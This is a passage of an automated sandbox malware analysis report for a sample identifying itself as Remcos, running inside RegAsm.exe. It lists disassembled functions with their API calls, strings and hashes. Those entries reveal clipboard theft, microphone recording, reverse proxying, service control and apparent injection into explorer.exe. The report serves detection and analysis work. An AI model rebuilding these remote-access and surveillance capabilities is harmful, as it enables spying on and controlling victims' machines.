                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2441525078-0
                                                                                                                                                                                          • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                          • API String ID: 2956720200-749203953
                                                                                                                                                                                          • Opcode ID: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                                                                                                                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                                          • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                                                                          • API String ID: 1704390241-2575729100
                                                                                                                                                                                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                                                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                                                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                                          • API String ID: 2172192267-604454484
                                                                                                                                                                                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 004481B5
                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 004481C1
                                                                                                                                                                                          • _free.LIBCMT ref: 004481CC
                                                                                                                                                                                          • _free.LIBCMT ref: 004481D7
                                                                                                                                                                                          • _free.LIBCMT ref: 004481E2
                                                                                                                                                                                          • _free.LIBCMT ref: 004481ED
                                                                                                                                                                                          • _free.LIBCMT ref: 004481F8
                                                                                                                                                                                          • _free.LIBCMT ref: 00448203
                                                                                                                                                                                          • _free.LIBCMT ref: 0044820E
                                                                                                                                                                                          • _free.LIBCMT ref: 0044821C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Eventinet_ntoa
                                                                                                                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                                          • API String ID: 3578746661-3604713145
                                                                                                                                                                                          • Opcode ID: a4ca492004d25daa6f3c8384586f1d4622d6566efdfbfa8d1641a6fedbe16b04
                                                                                                                                                                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4ca492004d25daa6f3c8384586f1d4622d6566efdfbfa8d1641a6fedbe16b04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                          • API String ID: 1462127192-2001430897
                                                                                                                                                                                          • Opcode ID: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                                                                                                                                                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                                                                          • Opcode Fuzzy Hash: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                                          • API String ID: 2050909247-4242073005
                                                                                                                                                                                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                                                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                                                                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _strftime.LIBCMT ref: 00401D50
                                                                                                                                                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                                                                          • API String ID: 3809562944-243156785
                                                                                                                                                                                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                                          • String ID: ,kG$0kG
                                                                                                                                                                                          • API String ID: 3815856325-2015055088
                                                                                                                                                                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                                                          • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                          • String ID: dMG$|MG$PG
                                                                                                                                                                                          • API String ID: 1356121797-532278878
                                                                                                                                                                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                          • String ID: Remcos
                                                                                                                                                                                          • API String ID: 1970332568-165870891
                                                                                                                                                                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                                                                          • __freea.LIBCMT ref: 00454083
                                                                                                                                                                                          • __freea.LIBCMT ref: 0045408F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 201697637-0
                                                                                                                                                                                          • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
